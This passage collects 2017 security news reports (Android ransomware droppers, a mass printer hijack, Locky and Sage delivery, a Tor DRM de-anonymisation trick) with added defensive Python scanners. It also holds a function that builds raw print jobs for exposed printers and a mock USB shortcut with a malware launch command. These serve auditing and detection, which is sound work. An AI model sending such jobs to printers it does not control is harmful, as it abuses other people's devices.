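    """Hidden attribute on Windows; dot-prefix elsewhere (best effort off-platform)."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return path.name.startswith(".") or bool(attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2))


def lnk_text(data):
    """Best-effort text view of a .lnk: its strings may be ASCII or UTF-16LE, so
    decode both ways and join; enough for byte-level triage without a full parser."""
    return data.decode("latin-1") + " " + data.decode("utf-16-le", "ignore")


def triage_drive(root):
    """List executables on the drive and any shortcut that launches one of them."""
    root = Path(root)
    findings = []
    exes = {p.name.lower(): p for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in EXEC_EXTS}
    for p in exes.values():
        findings.append({"path": p.relative_to(root).as_posix(),
                         "reason": "executable", "hidden": is_hidden(p)})
    for p in root.rglob("*.lnk"):
        if not p.is_file():
            continue
        data = p.read_bytes()
        rel = p.relative_to(root).as_posix()
        if not data.startswith(LNK_MAGIC):
            findings.append({"path": rel, "reason": "malformed-shortcut"})
            continue
        text = lnk_text(data).lower()
        if "cmd.exe" in text and "start" in text:
            findings.append({"path": rel, "reason": "shortcut-uses-cmd-start"})
        for name in set(EXE_NAME_RE.findall(text)):
            if name in exes:          # the shortcut launches something that lives on the drive
                findings.append({"path": rel, "reason": "shortcut-launches-drive-executable",
                                 "target": exes[name].relative_to(root).as_posix()})
    return sorted(findings, key=lambda f: (f["path"], f["reason"]))


def build_sample_drive():
    """Constructed stand-in for the infected thumb drive described in the article:
    porn.exe at the root plus a shortcut whose command line is
    cmd.exe /c start %cd%\\porn.exe. The .lnk is only a byte-level mock (header
    prefix + UTF-16LE command line), not a valid ShellLink file."""
    root = Path(tempfile.mkdtemp(prefix="usb_"))
    (root / "Holiday photos").mkdir()
    (root / "Holiday photos" / "IMG_0001.jpg").write_bytes(b"\xff\xd8\xff placeholder")
    (root / "porn.exe").write_bytes(b"MZ placeholder, not a real binary")
    cmd = r"C:\WINDOWS\system32\cmd.exe /c start %cd%\porn.exe"
    (root / "Holiday photos.lnk").write_bytes(
        LNK_MAGIC + b"\x00" * 0x44 + cmd.encode("utf-16-le"))
    return root


def demo():
    """Build the sample drive, triage it, clean up, and return the findings."""
    root = build_sample_drive()
    try:
        return triage_drive(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point triage_drive at the mount point of a suspect stick (with autorun disabled and, ideally, from a non-Windows analysis box so nothing on it can execute); a shortcut named after a folder that launches an executable at the drive root is the pattern to look for.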


Android Ransomware Uses Dropper to Increase Effectiveness

7.2.2017 securityweek Virus
The use of droppers to infect devices with ransomware has spread to Android, Symantec security researchers warn.

The use of a dropper to deliver malware on Android is a new technique, although it is a very popular one when it comes to malware for desktop computers. Furthermore, researchers say, the actors using it have also implemented a 2D barcode technique meant to help them receive payment from victims, but they did this ineffectively.

Spotted about a year ago, the Lockdroid ransomware was designed to encrypt user files and perform other nefarious activities as well. It requests device admin rights and, if the user grants them, it can also lock devices, prevent the user from uninstalling it using the user interface (UI) or the command line interface, and can even force factory resets, thus erasing all user data from the device.

The dropper that delivers the Android.Lockdroid.E ransomware is distributed through third-party app stores, as well as via text messages and forum posts. Symantec found that it only drops its embedded payload on rooted devices; on devices that haven't been rooted it simply locks the screen.

Once installed on a device, the malicious app checks to see whether the device has been rooted and requests root access permissions if it has. The malware claims that this would allow it to access thousands of adult movies for free, in an effort to convince potential victims of the necessity of these permissions.

Once the user agrees, the malware drops a copy of itself onto the device, by remounting the /system partition, copying the embedded APK file for Android.Lockdroid.E to /system/app/[THREAT NAME].apk, changing the dropped APK file's permission to executable, and rebooting the device so the threat can run on boot completed as a system application.

After the reboot, the threat is difficult to uninstall from the infected devices, because it has become a system application. After the installation process has been completed, Android.Lockdroid.E locks the device and displays the ransom screen and 2D barcode.

On unrooted devices, the ransomware immediately locks the device and displays the ransom screen and barcode. In such cases, however, the malware does not drop anything onto the compromised device. According to Symantec, the ransom demanded by this Trojan is rather difficult to pay.

“The instructions ask the user to scan the barcode to log in to a messaging app to pay the ransom. While this may seem like a good idea to have victims pay the ransom for their device, it is ineffective in practice. There is no way to scan the barcode or log in to the messaging app from the compromised device, so the barcode must be scanned from a second device. This makes it more difficult for the victim to pay their ransom and for the attacker to receive payment,” the security researchers say.


A Hacker hijacked over 150,000 Printers publicly exposed online
7.2.2017 securityaffairs Hacking

A hacker hijacked over 150,000 Printers publicly exposed online to warn owners of cyber attacks.
Recently a group of researchers from the University Alliance Ruhr found a cross-site printing bug in the decades-old PostScript language. Popular printer models manufactured by Dell, Brother, Konica, Samsung, HP, and Lexmark are affected by vulnerabilities that attackers could exploit to steal passwords, lift information from print jobs, and shut down the devices.

Following the above research, a hacker with the online moniker Stackoverflowin decided to hack thousands of publicly exposed printers and to print rogue messages, including ASCII art depicting robots and warned that the printers had been hacked and they were part of a botnet.


The hacker said he wants to raise awareness about the risks of cyber attacks on printers exposed to the internet.

“A grey-hat hacker going by the name of Stackoverflowin says he’s pwned over 150,000 printers that have been left accessible online.” reads a blog post published by Bleeping Computer.

“Speaking to Bleeping Computer, the hacker says he wanted to raise everyone’s awareness towards the dangers of leaving printers exposed online without a firewall or other security settings enabled”

Stackoverflowin, who claims to be a British high-school student and a passionate security researcher, explained that he simply sent print jobs over the Line Printer Daemon protocol (LPD, port 515), the Internet Printing Protocol (IPP, port 631) and the raw printing protocol on port 9100 to printers that were exposed on the internet without any authentication.

Stackoverflowin went further: he also exploited an undisclosed remote command execution (RCE) vulnerability in the web management interface of Xerox devices.

The young hacker estimated that he compromised up to 150,000 printers, but he also added to have access to more RCE vulnerabilities which would have allowed him to access more than 300,000 printers.

Stackoverflowin wrote an automated script which scans the Internet for open printer ports and sends a rogue print job to the device.
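The practical counterpart to the hacker's scan is to check your own printers from the outside. The following Python script is an added example, not Stackoverflowin's script; it tests the three ports named above (LPD 515, IPP 631, raw 9100) and, where 9100 answers, asks the device for its model with the standard PJL INFO ID query. build_text_job shows what a raw port-9100 job looks like (plain text framed in PJL; the exact framing a given printer accepts is an assumption). The default target 192.0.2.10 is a documentation-range placeholder; only run this against devices you are responsible for.

```python
import socket
from typing import Dict, List, Optional

UEL = b"\x1b%-12345X"   # PJL Universal Exit Language sequence that frames every PJL job
PRINTER_PORTS = {515: "lpd", 631: "ipp", 9100: "raw (AppSocket/JetDirect)"}


def pjl_info_id() -> bytes:
    """Harmless PJL query; most printers answer with their model string."""
    return UEL + b"@PJL INFO ID\r\n" + UEL


def build_text_job(text: str, job_name: str = "audit") -> bytes:
    """Wrap plain text in a PJL job so a raw port-9100 listener prints it and ejects
    the page (form feed). This is the kind of job the article describes being sent
    to exposed printers; only send it to devices you own."""
    body = text.replace("\n", "\r\n").encode("ascii", "replace")
    return (UEL + b'@PJL JOB NAME = "' + job_name.encode("ascii") + b'"\r\n'
            + b"@PJL ENTER LANGUAGE=PCL\r\n" + body + b"\x0c"
            + UEL + b"@PJL EOJ\r\n" + UEL)


def port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """TCP connect check; any socket error (refused, unreachable, sandboxed) counts as closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def query_model(host: str, timeout: float = 2.0) -> Optional[str]:
    """Send @PJL INFO ID over port 9100 and return the reply text, or None."""
    try:
        with socket.create_connection((host, 9100), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(pjl_info_id())
            return s.recv(512).decode("ascii", "replace").strip() or None
    except OSError:
        return None


def audit_printer(host: str, timeout: float = 2.0) -> Dict[str, object]:
    """Report which printing ports answer from the vantage point this runs on.
    Run it from outside your network (or a guest VLAN) to see what the internet sees."""
    exposed: List[Dict[str, object]] = [
        {"port": port, "protocol": proto}
        for port, proto in PRINTER_PORTS.items() if port_open(host, port, timeout)
    ]
    report: Dict[str, object] = {"host": host, "exposed": exposed}
    if any(e["port"] == 9100 for e in exposed):
        report["model"] = query_model(host, timeout)
    return report


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:] or ["192.0.2.10"]:   # TEST-NET placeholder address
        print(audit_printer(target, timeout=1.0))
```

Any printer that reports an open port from outside the perimeter should be moved behind a firewall rule or VPN; a model string coming back over 9100 means anyone on the internet can also send it a job.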


Below is the latest version of the message sent to the printers:

stackoverflowin the hacker god has returned, your printer is part of a flaming botnet, operating on putin's forehead utilising BTI's (break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Many users on Twitter shared images of the rogue messages sent on Friday to their printers.

The case shows the importance of protecting devices exposed online, for example by enforcing access rules on routers, placing printers behind a VPN, or allowing access only from specific IP addresses.


Danger is losing its bite: the dangerous virus is in retreat

6.2.2017 Novinky/Bezpečnost Viruses
The malicious code Danger was the most widespread threat circulating on the internet for several months last year. It is now in retreat, its share having dropped markedly in January, according to statistics from the antivirus company Eset.
It should be said up front that Danger was still the most widespread threat in January. Its share, however, fell dramatically month on month, by more than 30 percentage points, to 11.05%. That is what shows this uninvited guest is on its way out.

The malware, detected under the full name JS/Danger.ScriptAttachment, is very dangerous: it opens a back door into the operating system. Attackers can then use it to smuggle further malicious code onto the infected computer, most often extortion malware from the ransomware family.

They encrypt stored data
This malicious code starts encrypting the contents of the computer and shows the user a notice that they must pay to have the computer decrypted, otherwise they will supposedly never get their data back.

Even after paying the ransom, users have no guarantee that they will actually get their data back. The virus has to be removed from the computer and the data then decrypted with a special tool; in some cases that is not possible.

“The drop in the Danger downloader's share is really significant. In December it accounted for almost every second threat we recorded; in January, only every tenth. We did, however, see a significant rise in various types of malware from the TrojanDownloader family,” said Miroslav Dvořák, technical director at Eset.

It downloads further malicious code
This malware can also cause considerable mischief on a computer. “As with Danger, and as the name itself suggests, it is code that tries to load further malicious code onto the infected device,” Dvořák noted.

TrojanDownloader, specifically its Agent.CHO variant, was the second most widespread threat with a 5.03% share. ProxyChanger and Nemucod follow in the top five.

The ten most widespread threats for January are listed in the table below:

Top 10 threats in the Czech Republic, January 2017
1. JS/Danger.ScriptAttachment (11.05%)
2. VBA/TrojanDownloader.Agent.CHO (5.03%)
3. JS/ProxyChanger (4.36%)
4. JS/TrojanDownloader.Nemucod (4.12%)
5. JS/Kryptik.RE (3.38%)
6. VBA/TrojanDownloader.Agent.CIY (2.55%)
7. VBA/TrojanDownloader.Agent.CIQ (2.04%)
8. Java/Adwind (2.01%)
9. JS/TrojanDownloader.Iframe (1.73%)
10. PowerShell/TrojanDownloader.Agent.DV (1.58%)
Source: Eset


Locky, Sage Ransomware Share Distribution Infrastructure

6.2.2017 securityweek Virus

Locky ransomware was recently observed being distributed using the same delivery infrastructure previously used to spread the Sage ransomware, PhishMe security researchers warn.

It’s not uncommon for cybercriminals to share infrastructure, so the reuse of the same resources to drop both Sage and Locky isn’t surprising. However, the discovery does show that Locky’s operators are working on securing new distribution venues, after the Necurs botnet, the main Locky distributor, went silent recently.

The Sage ransomware emerged on the threat landscape at the end of 2016 and was detailed early this year. The first delivery emails employed explicit or racy narratives to trick users into opening malicious attachments, but the actors then moved to business-related themes and started using random numbers in email subjects to elude some basic spam filters.

Some of the distribution emails didn't have a subject line at all, but featured the recipient's name as part of the attachment's file name, which was usually a double-zipped archive containing a malicious Office document or .js file. Other emails claimed to contain information about a financial transaction that had been rejected, or about a refund deposit that had failed after an order had been canceled.

According to PhishMe, the campaign they analyzed leveraged a .zip file (named “document_1.zip”) with a JavaScript application inside, meant to download the Sage ransomware in the form of a Windows executable. The payload was retrieved from the domain affections[.]top, and the malware leveraged the same payment gateway’s Tor site as before, as well as the Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com.
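The delivery chain described above, an archive nested inside an archive with a script at the bottom, is something a mail gateway can check for before the message reaches a user. The following is an added example, not PhishMe's code or anything recovered from the campaign: a scanner that opens a zip attachment in memory, descends into nested zips up to a fixed depth, and reports every script-type member it finds. The sample attachment is constructed inline to mirror the "document_1.zip" shape described above; the extension list and the depth and size limits are my assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Script types to flag: .js as in the campaign, plus other Windows script
# hosts a gateway would reasonably treat the same way (assumption).
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".vbs", ".hta"}
MAX_DEPTH = 4                       # stop descending into absurdly nested archives
MAX_MEMBER_SIZE = 5 * 1024 * 1024   # do not inflate oversized members in memory


def find_script_members(blob, depth=0, prefix=""):
    """Return paths ('outer.zip!/inner.js') of script files inside `blob`, recursing into nested zips."""
    if depth > MAX_DEPTH:
        return [prefix + "<max depth exceeded>"]
    try:
        archive = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return []                   # not an archive at all, nothing to inspect
    found = []
    for info in archive.infolist():
        path = prefix + info.filename
        if info.file_size > MAX_MEMBER_SIZE:
            found.append(path + " <oversize member skipped>")
            continue
        data = archive.read(info)
        if zipfile.is_zipfile(io.BytesIO(data)):
            # Nested archive: descend and prefix results with the container name.
            found.extend(find_script_members(data, depth + 1, path + "!/"))
        elif PurePosixPath(info.filename).suffix.lower() in SCRIPT_EXTENSIONS:
            found.append(path)
    return found


def build_sample_attachment():
    """Constructed sample: document_1.zip -> document_1.zip -> document_1.js (plus a benign file)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("document_1.js", "var sh = new ActiveXObject('WScript.Shell');")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("document_1.zip", inner.getvalue())
        z.writestr("readme.txt", "harmless text")
    return outer.getvalue()


if __name__ == "__main__":
    for hit in find_script_members(build_sample_attachment()):
        print("script inside attachment:", hit)
```

Run on the constructed sample the scanner reports `document_1.zip!/document_1.js` and ignores the text file; a gateway rule would quarantine on any non-empty result.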

Starting on January 26, 2017, however, a phishing campaign used to deliver the Locky ransomware was observed using the very same email narratives and metadata. Furthermore, the domain affections[.]top was being used as part of the delivery process for this ransomware family on Monday, January 30.

“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes. The relation between Locky and Kovter has been detailed a few times lately, most recently by Microsoft, which stumbled upon a two-step delivery technique which attempted to drop Locky first, but switched to Kovter if that failed.

The overlapping infrastructure demonstrates once again how frequently cybercriminals reuse malware support and distribution infrastructure. The distribution of both Sage and Locky from the same location can be seen as evidence of the commodity status of ransomware tools like these. Both families are delivered with the same attributes and infrastructure, and to equal effect, but the overlap also gives researchers and security professionals a few avenues for mitigating them.

“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” PhishMe notes.


Many Darknet Sites Defaced in "Freedom Hosting II" Hack

6.2.2017 securityweek Hacking

Thousands of Tor-based websites became inaccessible last week after hackers breached the systems of Freedom Hosting II, a service provider that is believed to host roughly 20 percent of the sites on the dark web.

While Freedom Hosting II has hosted nearly 11,000 websites, an analysis conducted by privacy and anonymity researcher Sarah Jamie Lewis has shown that only 1,500 - 2,500 of them had any content.

Hackers affiliated with the Anonymous hacktivist movement said more than half of the websites hosted by Freedom Hosting II contained child pornography, despite the provider’s claims that it does not tolerate this type of content.

As a result, the hackers defaced all the sites hosted by Freedom Hosting II and leaked data taken from its systems. The hackers also provided information on how they managed to breach the organization's systems.

Users who attempted to access the websites were shown a message that started with, “Hello Freedom Hosting II, you have been hacked.” The Verge reported that the hackers initially offered to sell the stolen data for 0.1 bitcoin (roughly $100), but later apparently decided to make it available for free. The address provided by the attackers has received a total of 0.12 bitcoins.

Sarah Jamie Lewis (@SarahJamieLewis), 6 Feb 2017:
"I've spent some time on the data now & I plan on writing much more about it in the future. But I'm gonna lay out my current thoughts."
"First off, as I commented on Friday, this is a huge event. I think this will likely be seen as a milestone in the history of anonymity tech."
"As an analogy: it's like someone taking down geocities in the late 90s... Sure there was lots of crap, but also lots of diverse content."
"FHII made it easy for people to start playing with anonymous publishing - and in doing so created a huge vulnerability."

Australian security expert Troy Hunt, the owner of the Have I Been Pwned breach notification service, analyzed the leaked data and discovered a 2.2 GB database containing more than 380,000 user records, including email addresses, usernames and passwords.

Hunt believes law enforcement agencies will find the leaked data very useful, especially since it includes real email addresses. He also pointed out that many of the addresses are on .gov domains, but it’s unclear how many of them are real and what they have been used for.

The leaked data was also analyzed by Chris Monteiro, who confirmed that Freedom Hosting II hosted some large English and Russian-language forums related to child abuse. The researcher also identified fraud, account hacking, fetish and botnet websites.

The original Freedom Hosting was taken down by the FBI back in 2013. Before shutting it down, the agency exploited a vulnerability to identify darknet users.


ENISA Report Provides ICS-SCADA Protection Recommendations

6.2.2017 securityweek Safety
ENISA Publishes "Communication Network Dependencies for ICS-SCADA Systems" Report for Critical Infrastructure Protection

The clear emergence of cyber weapons used for political interference -- cyber espionage such as the OPM breach probably related to China; political manipulation such as the breach and leaks relating to the DNC by Russia; and physical damage such as the Ukraine power outages by Russia or its supporters -- has focused attention on the security of the critical national infrastructures. Much of that infrastructure is controlled and operated by ICS/SCADA systems.

The European Union Agency for Network and Information Security (ENISA) has published a new analysis and recommendations on 'Communication network dependencies for ICS/SCADA Systems' (PDF). The report concentrates on two of the primary causes of security concern: network segmentation and communication between the segments; and the wider issue of communications with the outside world that often uses the Internet.

The report was compiled from an analysis of stakeholder conversations with members of the ENISA ICS and SCADA groups together with data from official sources and other ICS/SCADA experts in the field. It highlights three primary causes for concern, and makes eight specific security recommendations for its target audience of asset owners and operators of electricity, oil, gas, transport, health, water supply, and the manufacturing industry.

The three worrying attack scenarios are remote compromise allowing an attacker to take control of one or multiple assets within the network; the insider threat from a disgruntled employee, contractor or third-party staff with in-depth knowledge of the infrastructure; and the risk of infection during the maintenance or upgrade process. Associated with the third concern is the website where the update files and firmware are located.


The report examines ICS/SCADA communication networks and their interdependencies, and examines the threats, vulnerabilities, incidents and attacks affecting those networks while focusing on those that might result in cascading effects. It also presents a gap analysis to highlight areas that require further work.

A section on security good practices outlines the necessary steps in first understanding and then protecting the network. This includes a list of technology and processes that can "greatly increase the protection of the availability, integrity, confidentiality and non-repudiation" of the network and its communications.

Finally, it presents a list of eight "high-level recommendations for manufacturers, operators and security experts that will help them to improve the security level and resilience of the ICS/SCADA systems and communication network functions." These are:

1. Include security as a main consideration during the design phase of ICS SCADA systems.

2. Identify and establish roles of people operating in ICS/SCADA systems.

3. Define network communication technologies and architecture with interoperability in mind.

4. Establish brainstorming and communication channels for the different participants on the lifecycle of the devices to exchange needs and solutions.

5. Include the periodic ICS/SCADA device update process as part of the main operations of the systems.

6. Establish periodic ICS/SCADA security training and awareness campaign within the organization.

7. Promote increased collaboration amongst policy decision makers, manufacturers and operators at EU Level.

8. Define guidelines for the establishment of reliable and appropriate cybersecurity insurance requirements.

These recommendations, modified where necessary, would form part of good practice for any industry. The ENISA report goes further by focusing on their particular relevance to operational technology. For example, for the first 'security by design' recommendation, it explains that, "Traditionally, only safety is included as one of the main considerations during the design of an ICS/SCADA system or infrastructure (alongside efficiency, real-time constraints, etc.). However, the concept of security is not, although it is now one of the main risk sources that should be covered to prevent future attacks and incidents."

While users have little control over ICS/SCADA development and manufacturing processes, ENISA recommends that "during the design phase, the security of the devices, and the communications between them, has to be one of the main concepts that will impact on the choice of devices, measures to implement, and overall design of the architecture."

As a result of this process, writes ENISA, "the systems' security is increased as many threats have been mitigated. This can be measured via risk assessment, vulnerability assessment or penetration test."

This basic structure is repeated for each of the recommendations: a description of the issue, action required, and effect of implementation. The result is a thorough examination of the ICS/SCADA security landscape together with practical steps to improve the security posture of the critical national infrastructure.


Microsoft Windows DRM issue could be exploited to uncloak Tor Browser users
6.2.2017 securityaffairs Exploit

HackerHouse researchers have discovered that media content protected by Digital Rights Management (DRM) can be used to uncloak Windows Tor Browser users.
The anonymity of Tor users is threatened by a new issue related to Microsoft's DRM. Windows users running the Tor Browser can be de-anonymized with a trick based on the Microsoft DRM (Digital Rights Management) mechanism.

The discovery was made by researchers at Hacker House while they were studying social engineering attacks that use DRM-protected content.

A Tor user can be unmasked simply by opening a media file: the license request it triggers reveals the user's real IP address.

“DRM is a licensing technology that attempts to prevent unauthorised distribution and restrictive use of a media file. It works by encrypting the video and audio streams with an encryption key and requesting a license (decryption key) from a network server when the file is accessed. As it requires network connectivity it can cause users to make network requests without consent when opening a media file such as a video file or audio file. WMV is using Microsoft Advanced Systems Format (ASF) to store audio and video as objects. This file format consists of objects that are labelled by GUID and packed together to make a media package.” reads the analysis published on myhackerhouse.com.

Put simply, DRM-protected content has to fetch a license key from a server before it can be played. Windows shows the user a warning dialog before doing so, but only if the content isn't signed properly.


“However, this warning DOES NOT appear if the DRM license has been signed correctly and the Digital Signature Object, Content Encryption Object and Extended Content Encryption Object contain the appropriate cryptographic signing performed by an authorised Microsoft License Server profile”
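The objects named in the quotation are top-level ASF header objects and can be enumerated without ever handing the file to Windows Media Player, which is the point at which the license request fires. The following is an added example, not Hacker House's code: a minimal ASF header walker that lists the DRM-related objects present in a file, exercised against a header constructed inline. The object GUIDs are the values from the ASF specification as I know them; treat them as an assumption to check against the specification before relying on this script.

```python
import struct
import uuid

# ASF object GUIDs (assumed from the ASF specification; verify before use).
ASF_HEADER_OBJECT      = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C")
FILE_PROPERTIES_OBJECT = uuid.UUID("8CABDCA1-A947-11CF-8EE4-00C00C205365")
CONTENT_ENCRYPTION     = uuid.UUID("2211B3FB-BD23-11D2-B4B7-00A0C955FC6E")
EXT_CONTENT_ENCRYPTION = uuid.UUID("298AE614-2622-4C17-B935-DAE07EE9289C")
DIGITAL_SIGNATURE      = uuid.UUID("2211B3FC-BD23-11D2-B4B7-00A0C955FC6E")

DRM_OBJECTS = {
    CONTENT_ENCRYPTION: "Content Encryption Object",
    EXT_CONTENT_ENCRYPTION: "Extended Content Encryption Object",
    DIGITAL_SIGNATURE: "Digital Signature Object",
}


def asf_object(guid, payload):
    """Serialize one ASF object: 16-byte GUID (mixed-endian on disk), 8-byte LE size including this header."""
    return guid.bytes_le + struct.pack("<Q", 24 + len(payload)) + payload


def drm_objects_in_header(data):
    """Walk the sub-objects of the ASF Header Object and return the names of DRM-related ones."""
    if len(data) < 30 or uuid.UUID(bytes_le=data[:16]) != ASF_HEADER_OBJECT:
        raise ValueError("not an ASF file")
    header_size, = struct.unpack_from("<Q", data, 16)
    count, = struct.unpack_from("<I", data, 24)
    # 24-byte object header, 4-byte sub-object count, 2 reserved bytes, then sub-objects.
    offset, end = 30, min(header_size, len(data))
    found = []
    for _ in range(count):
        if offset + 24 > end:
            raise ValueError("truncated header object")
        guid = uuid.UUID(bytes_le=data[offset:offset + 16])
        size, = struct.unpack_from("<Q", data, offset + 16)
        if size < 24 or offset + size > end:
            raise ValueError("bad sub-object size")   # refuse to walk past the header
        if guid in DRM_OBJECTS:
            found.append(DRM_OBJECTS[guid])
        offset += size
    return found


def build_sample(drm):
    """Constructed minimal ASF header: a File Properties object, plus the three DRM objects when drm=True."""
    subs = [asf_object(FILE_PROPERTIES_OBJECT, b"\x00" * 80)]
    if drm:
        subs.append(asf_object(CONTENT_ENCRYPTION, b"\x00" * 16))
        subs.append(asf_object(EXT_CONTENT_ENCRYPTION, b"\x00" * 8))
        subs.append(asf_object(DIGITAL_SIGNATURE, b"\x00" * 8))
    body = struct.pack("<IBB", len(subs), 0x01, 0x02) + b"".join(subs)
    return asf_object(ASF_HEADER_OBJECT, body)


if __name__ == "__main__":
    print("plain file:", drm_objects_in_header(build_sample(False)))
    print("signed DRM file:", drm_objects_in_header(build_sample(True)))
```

Any non-empty result means the file will try to reach a license server when opened; on a real file, read only the Header Object (its size field tells you how much) rather than the whole media stream.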


Researchers at Hacker House pointed out that obtaining the ability to sign media this way is expensive.

“DRM is expensive business and unless you use the SDK to develop your own application you will likely need to make use of a license provider to encrypt your WMV files using these tools and also for signing purposes. If you want to build your own Microsoft DRM signing solution the price-tag is around $10,000.” states Hacker House.

The researchers nevertheless found online services that will sign content without that outlay. A WMV signed through one of these Windows DRM providers can be used to decloak Tor users.

“There are several free DRM providers who could sign your media for you however as the barrier to entry to the DRM market is the aforementioned price tag, it makes you wonder how these files are being signed in the wild!” continues the analysis.

“As these “signed WMV” files do not present any alert to a user before opening them they can be used quite effectively to decloak users of the popular privacy tool TorBrowser with very little warning”, they write.

The Tor Project is aware that attackers could use the Windows DRM mechanism to track Windows Tor Browser users. It advises users who need to open media files to do so in Tails.


A fifth of companies worldwide were targeted by a cyberattack last year

6.2.2017 Novinky/Bezpečnost Cyber
The share of companies worldwide that were targeted by a cyberattack rose last year by six percentage points to 21 percent. The total estimated damage for 2016 is 279 billion US dollars (almost seven trillion crowns). Extortion was the fastest-growing category. This follows from a Grant Thornton study covering information from 10,000 companies in 37 countries.
In North America 24 percent of companies admitted attacks, and in the EU as many as 32 percent. The average is pulled down by the Asia-Pacific region, with 13 percent of companies attacked. The marked rise in cybercrime, however, affects all regions.

The most frequent primary consequence of a cyberattack is damaged reputation, cited by 29 percent of companies, followed by the loss of time and energy that must be spent repairing the damage done. Sixteen percent of companies named loss of customers as the primary damage, and seven percent felt a direct drop in turnover.

Extortion is in fashion
The most commonly occurring form of cyberattack is damage to business infrastructure, admitted by 22 percent of the attacked companies. Seventeen percent of companies admitted experience with extortion under threat of publishing information, violence, or damage to company assets.

"Extortion has traditionally been perceived as a very foul practice within the range of financial crimes. In the online world, extortion is moreover very well organized. It does not end with the attack itself. Following such an attack, the organization suffers further financial losses due to damaged reputation, theft of information and intellectual property, and possibly physical damage to infrastructure," said Grant Thornton partner David Pirner.

According to Grant Thornton experts, companies react to cyberattacks too late. A total of 13 percent of companies found out that they had been victims of a cyberattack only after more than a week. Four companies in a hundred found out only after more than a month.


Did the hacking of the foreign ministry come at just the right time?
6.2.2017 Novinky/Bezpečnost BigBrother
The sponsors of the Military Intelligence bill are "on a high". It is now surely evident that the Czech Republic needs cyber defence and that the state will take care of it best.
As you surely know, an amendment to the Act on Military Intelligence is currently before the Chamber of Deputies which is to entrust the defence (yes, that is definitely something different from protection) of Czech cyberspace to Military Intelligence (VOZ). If you will allow me a great simplification, the act essentially says that VOZ will install cyber defence instruments into operators' networks, these being technical means leading to the prevention, stopping or averting of a cyberattack threatening the provision of the defence of the Czech Republic. Operators are obliged to keep quiet about the connection of the cyber defence instruments.

No wonder that such a vaguely worded act has raised a wave of resentment. Probably the most visible protest is the statement of three significant associations: CZ.NIC, ICT Unie and NIX.CZ. Of course, many more arguments against this amendment can be found. Then came news like a thunderbolt that someone had hacked the mail server of the Ministry of Foreign Affairs of the Czech Republic, and suddenly the sponsors of the act are "on a high". It is now surely evident that the Czech Republic needs cyber defence and that the state will take care of it best. I also read an interesting interview on this topic on Aktualne.cz. But is this security incident really an argument for adopting this amendment? I think it is exactly the opposite!

In the interview mentioned, the minister of (general) defence states that if the act were adopted, military intelligence would intervene. It sounds like a clear argument for the rapid adoption of the act. But I keep asking myself: "Who was stopping them?" And now please forgive me for treating the state administration as a single whole in the following lines. Nevertheless, the state was surely in no way prohibited from taking care of its own cyber security (or defence, if you prefer). If the state wants to put cyber defence devices into the networks of private operators, why has it not already installed them into its own state networks, to show how beneficial these devices are? Why does the state, or specifically VOZ, not boast about the number of attacks repelled in the networks of state authorities, to show that this would clearly benefit the private sector too? Isn't it rather the other way round? No significant private e-mail provider has had such a serious incident recently. So why does someone think that the state will protect us and that it should install cyber defence instruments in the networks of private operators? Why doesn't it start with itself? It could start, for example, at the MFA and the other ministries.

Incidentally, it is very interesting to watch how the sponsors' argumentation for the act changes in reaction to the associations' statement. For instance, even the interview mentioned says that the cyber defence devices will be only passive, so taking them out of service cannot cause any more serious operational problems. But that is in direct contrast to the definition contained in the proposed amendment. That definition speaks clearly of technical means leading to the prevention, stopping or averting of a cyberattack. If the devices are to be only for interception, why does the bill speak of stopping and averting?

I definitely support the state's effort to increase the cyber security of its systems. But I do not think the right means is the interception of all networks, including those unrelated to state systems. I firmly believe that every cloud has a silver lining. I hope this strange bill will kick off a serious debate on how to increase the country's cyber security, and that the state will abandon its strange Orwellian ideas and start seriously dealing with how to improve the security of its own IT systems.


Darknet Marketplace Hansa Launches Bug Bounty Program

6.2.2017 securityweek Security
The darknet marketplace Hansa announced last week the launch of a bug bounty program with rewards of up to 10 bitcoins, currently worth more than $10,000.

Hansa allows users to buy and sell various types of items, including drugs, fraud-related services, jewelry, counterfeit products, electronics, and IT services. The marketplace is designed to minimize the risk of scams operated by vendors and Hansa administrators, and claims to guarantee that users will not lose their funds in case of a hack or law enforcement operation.

In an effort to minimize the chances of the website getting hacked, Hansa’s owners have decided to launch a bug bounty program. The highest rewards, up to 10 bitcoins, will be paid out for vulnerabilities that could “severely disrupt Hansa’s integrity,” such as flaws that expose IP addresses or user information.

Hansa has promised 1 bitcoin, worth roughly $1,000, for bugs and vulnerabilities that are not critical. Users can also earn 0.05 bitcoins ($50) for reporting simple display bugs or unintended behavior.

“To be eligible, you must demonstrate a security compromise on our market using a reproducible exploit. Should you encounter a bug please open a ticket and inform us about your findings,” Hansa administrators wrote in a Reddit post announcing the bug bounty program.

Users who submit vulnerability or bug reports must not make their findings public before the issue has been fixed, and they must refrain from conducting any tests that could have a negative impact on the website or its users. Hansa has advised users to provide detailed proof-of-concepts (PoCs) to increase their chances of receiving a reward.

Hansa has promised to respond to vulnerability and bug reports as quickly as it can, and provide updates while it works to address the problem.

In the Reddit post announcing the launch of the bug bounty program, two users said they had already submitted reports describing vulnerabilities that could have serious consequences if exploited.

